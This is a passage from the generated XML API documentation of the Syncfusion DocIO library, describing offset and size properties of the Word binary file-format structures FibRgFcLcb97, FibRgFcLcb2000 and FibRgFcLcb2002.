        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfHdrtxbxTxt">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfHdrtxbxTxt begins at 
            this offset and specifies which ranges of text are contained in which header textboxes.
            </summary>
            <value>
            The fc PLCF HDRTXBX text.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfHdrtxbxTxt">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfHdrtxbxTxt that begins at 
            offset fcPlcfHdrtxbxTxt in the Table Stream.
            </summary>
            <value>
            The LCB PLCF HDRTXBX text.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcffldHdrTxbx">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcFld at offset fcPlcffldHdrTxbx
            in the Table Stream.
            </summary>
            <value>
            The fc PLCFFLD HDR TXBX.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcffldHdrTxbx">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcFld at offset fcPlcffldHdrTxbx
            in the Table Stream.
            </summary>
            <value>
            The LCB PLCFFLD HDR TXBX.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcStwUser">
            <summary>
            Gets or sets An unsigned integer that specifies an offset into the Table Stream. An StwUser that specifies 
            the user-defined variables and VBAdigital signature (2), as specified by [MS-OSHARED] section 2.3.2, begins 
            at this offset. 
            </summary>
            <value>
            The fc STW user.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbStwUser">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the StwUser at offset fcStwUser.
            </summary>
            <value>
            The LCB STW user.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbTtmbd">
            <summary>
            Gets or sets An unsigned integer that specifies an offset into the Table Stream. A SttbTtmbd begins at this 
            offset and specifies information about the TrueType fonts that are embedded in the document. If lcbSttbTtmbd
            is zero, fcSttbTtmbd is undefined and MUST be ignored.
            </summary>
            <value>
            The fc STTB TTMBD.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbTtmbd">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbTtmbd at offset fcSttbTtmbd.
            </summary>
            <value>
            The LCB STTB TTMBD.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcCookieData" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbCookieData">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the RgCdb at offset fcCookieData in 
            the Table Stream.
            </summary>
            <value>
            The LCB cookie data.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPgdMotherOldOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPgdMotherOldOld">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated document page layout 
            cache at offset fcPgdMotherOldOld in the Table Stream.
            </summary>
            <value>
            The LCB PGD mother old old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcBkdMotherOldOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbBkdMotherOldOld">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated document text flow 
            break cache at offset fcBkdMotherOldOld in the Table Stream.
            </summary>
            <value>
            The LCB BKD mother old old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPgdFtnOldOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPgdFtnOldOld">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated footnote layout cache 
            at offset fcPgdFtnOldOld in the Table Stream.
            </summary>
            <value>
            The LCB PGD FTN old old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcBkdFtnOldOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbBkdFtnOldOld">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated footnote text flow 
            break cache at offset fcBkdFtnOldOld in the Table Stream.
            </summary>
            <value>
            The LCB BKD FTN old old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPgdEdnOldOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPgdEdnOldOld">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated endnote layout cache 
            at offset fcPgdEdnOldOld in the Table Stream.
            </summary>
            <value>
            The LCB PGD edn old old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcBkdEdnOldOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbBkdEdnOldOld">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated endnote text flow 
            break cache at offset fcBkdEdnOldOld in the Table Stream.
            </summary>
            <value>
            The LCB BKD edn old old.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbfIntlFld">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc STTBF intl field.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfIntlFld">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB STTBF intl field.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcRouteSlip" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbRouteSlip">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the RouteSlip at offset fcRouteSlip 
            in the Table Stream.
            </summary>
            <value>
            The LCB route slip.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbSavedBy" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbSavedBy" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbFnm">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An SttbFnm that contains 
            information about the external files that are referenced by this document begins at this offset. If 
            lcbSttbFnm is zero, fcSttbFnm is undefined and MUST be ignored.
            </summary>
            <value>
            The fc STTB FNM.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbFnm">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbFnm at the offset fcSttbFnm.
            </summary>
            <value>
            The LCB STTB FNM.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlfLst">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlfLst that contains list 
            formatting information begins at this offset. An array of LVLs is appended to the PlfLst.
            </summary>
            <value>
            The fc PLF LST.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlfLst">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlfLst at the offset fcPlfLst. 
            This does not include the size of the array of LVLs that are appended to the PlfLst.
            </summary>
            <value>
            The LCB PLF LST.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlfLfo">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlfLfo that contains list 
            formatting override information begins at this offset. If lcbPlfLfo is zero, fcPlfLfo is undefined and MUST 
            be ignored.
            </summary>
            <value>
            The fc PLF lfo.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlfLfo">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlfLfo at the offset fcPlfLfo.
            </summary>
            <value>
            The LCB PLF lfo.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfTxbxBkd">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcftxbxBkd begins at this 
            offset and specifies which ranges of text go inside which textboxes.
            </summary>
            <value>
            The fc PLCF TXBX BKD.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfTxbxBkd">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcftxbxBkd that begins at offset
            fcPlcfTxbxBkd in the Table Stream.
            </summary>
            <value>
            The LCB PLCF TXBX BKD.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfTxbxHdrBkd">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfTxbxHdrBkd begins at 
            this offset and specifies which ranges of text are contained inside which header textboxes.
            </summary>
            <value>
            The fc PLCF TXBX HDR BKD.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfTxbxHdrBkd">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfTxbxHdrBkd that begins at 
            offset fcPlcfTxbxHdrBkd in the Table Stream.
            </summary>
            <value>
            The LCB PLCF TXBX HDR BKD.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcDocUndoWord9" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbDocUndoWord9">
            <summary>
            Gets or sets An unsigned integer. If this is nonzero, version-specific undo information exists at offset 
            fcDocUndoWord9 in the WordDocument Stream.
            </summary>
            <value>
            The LCB document undo word9.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcRgbUse" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbRgbUse">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the version-specific undo information
            at offset fcRgbUse in the WordDocument Stream.
            </summary>
            <value>
            The LCB RGB use.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcUsp" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbUsp">
            <summary>
            Gets or sets  An unsigned integer that specifies the size, in bytes, of the version-specific undo 
            information at offset fcUsp in the WordDocument Stream.
            </summary>
            <value>
            The LCB usp.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcUskf" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbUskf">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the version-specific undo informatio 
            at offset fcUskf in the Table Stream.
            </summary>
            <value>
            The LCB uskf.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcupcRgbUse" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcupcRgbUse">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the Plc at offset fcPlcupcRgbUse in 
            the Table Stream.
            </summary>
            <value>
            The LCB plcupc RGB use.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcupcUsp" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcupcUsp">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the Plc at offset fcPlcupcUsp in the 
            Table Stream.
            </summary>
            <value>
            The LCB plcupc usp.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbGlsyStyle">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A SttbGlsyStyle, which 
            contains information about the styles that are used by the AutoText items which are defined in this 
            document, begins at this offset. 
            </summary>
            <value>
            The fc STTB glsy style.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbGlsyStyle">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbGlsyStyle at offset 
            fcSttbGlsyStyle in the Table Stream. If base.fGlsy of the Fib that contains this FibRgFcLcb97 is zero, this 
            value MUST be zero.
            </summary>
            <value>
            The LCB STTB glsy style.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlgosl">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlfGosl begins at the 
            offset. If lcbPlgosl is zero, fcPlgosl is undefined and MUST be ignored.
            </summary>
            <value>
            The fc plgosl.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlgosl">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlfGosl at offset fcPlgosl in the
            Table Stream.
            </summary>
            <value>
            The LCB plgosl.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcocx">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A RgxOcxInfo that specifies 
            information about the OLE controls in the document begins at this offset. 
            </summary>
            <value>
            The fc plcocx.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcocx">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the RgxOcxInfo at the offset 
            fcPlcocx.
            </summary>
            <value>
            The LCB plcocx.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfBteLvc" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfBteLvc" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97DwLowDateTime">
            <summary>
            Gets or sets The low-order part of a FILETIME structure, as specified by [MS-DTYP], that specifies when the 
            document was last saved.
            </summary>
            <value>
            The dw low date time.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97DwHighDateTime">
            <summary>
            Gets or sets The high-order part of a FILETIME structure, as specified by [MS-DTYP], that specifies when the
            document was last saved.
            </summary>
            <value>
            The dw high date time.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfLvcPre10" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfLvcPre10" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfAsumy">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfAsumy begins at the 
            offset. If lcbPlcfAsumy is zero, fcPlcfAsumy is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF asumy.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfAsumy">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfAsumy at offset fcPlcfAsumy 
            in the Table Stream.
            </summary>
            <value>
            The LCB PLCF asumy.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfGram">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A Plcfgram, which specifies 
            the state of the grammar checker for each text range, begins at this offset. If lcbPlcfGram is zero, then 
            fcPlcfGram is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF gram.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfGram">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the Plcfgram that begins at offset 
            fcPlcfGram in the Table Stream.
            </summary>
            <value>
            The LCB PLCF gram.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbListNames">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A SttbListNames, which 
            specifies the LISTNUM field names of the lists in the document, begins at this offset. 
            </summary>
            <value>
            The fc STTB list names.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbListNames">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbListNames at the offset 
            fcSttbListNames.
            </summary>
            <value>
            The LCB STTB list names.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97fcSttbfUssr" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfUssr">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated, version-specific undo
            information at offset fcSttbfUssr in the Table Stream.
            </summary>
            <value>
            The LCB STTBF ussr.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcPlcfTch" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbPlcfTch">
            <summary>
            Gets or sets  An unsigned integer that specifies the size, in bytes, of the PlcfTch at offset fcPlcfTch.
            </summary>
            <value>
            The LCB PLCF TCH.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcRmdThreading">
            <summary>
            Gets or sets  An unsigned integer that specifies an offset in the Table Stream. An RmdThreading that specifies the data concerning the e-mail
            messages and their authors in this document begins at this offset.
            </summary>
            <value>
            The fc RMD threading.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbRmdThreading">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the RmdThreading at the offset fcRmdThreading. This value MUST NOT be zero.
            </summary>
            <value>
            The LCB RMD threading.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcMid">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A double-byte character Unicode string that specifies the 
            message identifier of the document begins at this offset. This value MUST be ignored.
            </summary>
            <value>
            The fc mid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbMid">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the double-byte character Unicode string at offset fcMid. This value MUST be ignored.
            </summary>
            <value>
            The LCB mid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcSttbRgtplc">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A SttbRgtplc that specifies the styles of lists in the document 
            begins at this offset. If lcbSttbRgtplc is zero, fcSttbRgtplc is undefined and MUST be ignored.
            </summary>
            <value>
            The fc STTB RGTPLC.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbSttbRgtplc">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbRgtplc at the offset fcSttbRgtplc.
            </summary>
            <value>
            The LCB STTB RGTPLC.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcMsoEnvelope">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An MsoEnvelopeCLSID, which specifies the envelope data as 
            specified by [MS-OSHARED] section 2.3.8.1, begins at this offset. If lcbMsoEnvelope is zero, fcMsoEnvelope is undefined and MUST be ignored.
            </summary>
            <value>
            The fc mso envelope.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbMsoEnvelope">
            <summary>
            Gets or sets  An unsigned integer that specifies the size, in bytes, of the MsoEnvelopeCLSID at the offset fcMsoEnvelope.
            </summary>
            <value>
            The LCB mso envelope.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcPlcfLad">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A Plcflad begins at this offset and specifies the language 
            auto-detect state of each text range. If lcbPlcfLad is zero, fcPlcfLad is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF lad.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbPlcfLad">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the Plcflad that begins at offset fcPlcfLad in the Table Stream.
            </summary>
            <value>
            The LCB PLCF lad.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcRgDofr">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A variable-length array with elements of type Dofrh begins at that offset.
            The elements of this array are records that support the frame set and list style features. If lcbRgDofr is zero, fcRgDofr is undefined and MUST be ignored.
            </summary>
            <value>
            The fc rg dofr.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbRgDofr">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the array that begins at offset fcRgDofr in the Table Stream.
            </summary>
            <value>
            The LCB rg dofr.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcPlcosl">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A PlfCosl begins at the offset. If lcbPlcosl is zero, 
            fcPlcosl is undefined and MUST be ignored.
            </summary>
            <value>
            The fc plcosl.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbPlcosl">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PlfCosl at offset fcPlcosl in the Table Stream.
            </summary>
            <value>
            The LCB plcosl.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcPlcfCookieOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbPlcfCookieOld">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PlcfcookieOld at offset fcPlcfcookieOld in the Table Stream.
            </summary>
            <value>
            The LCB PLCF cookie old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcPgdMotherOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbPgdMotherOld">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated document page layout cache at offset fcPgdMotherOld in the Table Stream.
            </summary>
            <value>
            The LCB PGD mother old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcBkdMotherOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbBkdMotherOld">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated document text flow break cache at offset fcBkdMotherOld in the Table Stream.
            </summary>
            <value>
            The LCB BKD mother old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcPgdFtnOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbPgdFtnOld">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated footnote layout cache at offset fcPgdFtnOld in the Table Stream.
            </summary>
            <value>
            The LCB PGD FTN old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcBkdFtnOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbBkdFtnOld">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated footnote text flow break cache at offset fcBkdFtnOld in the Table Stream.
            </summary>
            <value>
            The LCB BKD FTN old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcPgdEdnOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbPgdEdnOld">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated endnote layout cache at offset fcPgdEdnOld in the Table Stream.
            </summary>
            <value>
            The LCB PGD edn old.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000FcBkdEdnOld" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2000LcbBkdEdnOld">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated endnote text flow break cache at offset fcBkdEdnOld in the Table Stream.
            </summary>
            <value>
            The LCB BKD edn old.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcUnused1">
            <summary>
            Gets or sets the fc unused1. This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc unused1.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbUnused1">
            <summary>
            Gets or sets the LCB unused1.This value MUST be zero, and MUST be ignored
            </summary>
            <value>
            The LCB unused1.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfPgp">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A PGPArray begins at this offset.
            If lcbPlcfPgp is 0, fcPlcfPgp is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF PGP.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfPgp">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PGPArray that is stored at offset fcPlcfPgp.
            </summary>
            <value>
            The LCB PLCF PGP.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfuim">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A Plcfuim begins at this offset. 
            If lcbPlcfuim is zero, fcPlcfuim is undefined and MUST be ignored.
            </summary>
            <value>
            The fc plcfuim.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfuim">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the Plcfuim at offset fcPlcfuim.
            </summary>
            <value>
            The LCB plcfuim.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlfguidUim">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A PlfguidUim begins at this offset.
            If lcbPlfguidUim is zero, fcPlfguidUim is undefined and MUST be ignored.
            </summary>
            <value>
            The fc plfguid uim.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlfguidUim">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PlfguidUim at offset fcPlfguidUim.
            </summary>
            <value>
            The LCB plfguid uim.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcAtrdExtra">
            <summary>
            Gets or sets  an unsigned integer that specifies an offset in the Table Stream. An AtrdExtra begins at this offset.
            If lcbAtrdExtra is zero, fcAtrdExtra is undefined and MUST be ignored.
            </summary>
            <value>
            The fc atrd extra.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbAtrdExtra">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the AtrdExtra at offset fcAtrdExtra in the Table Stream.
            </summary>
            <value>
            The LCB atrd extra.
            </value>
        </member>
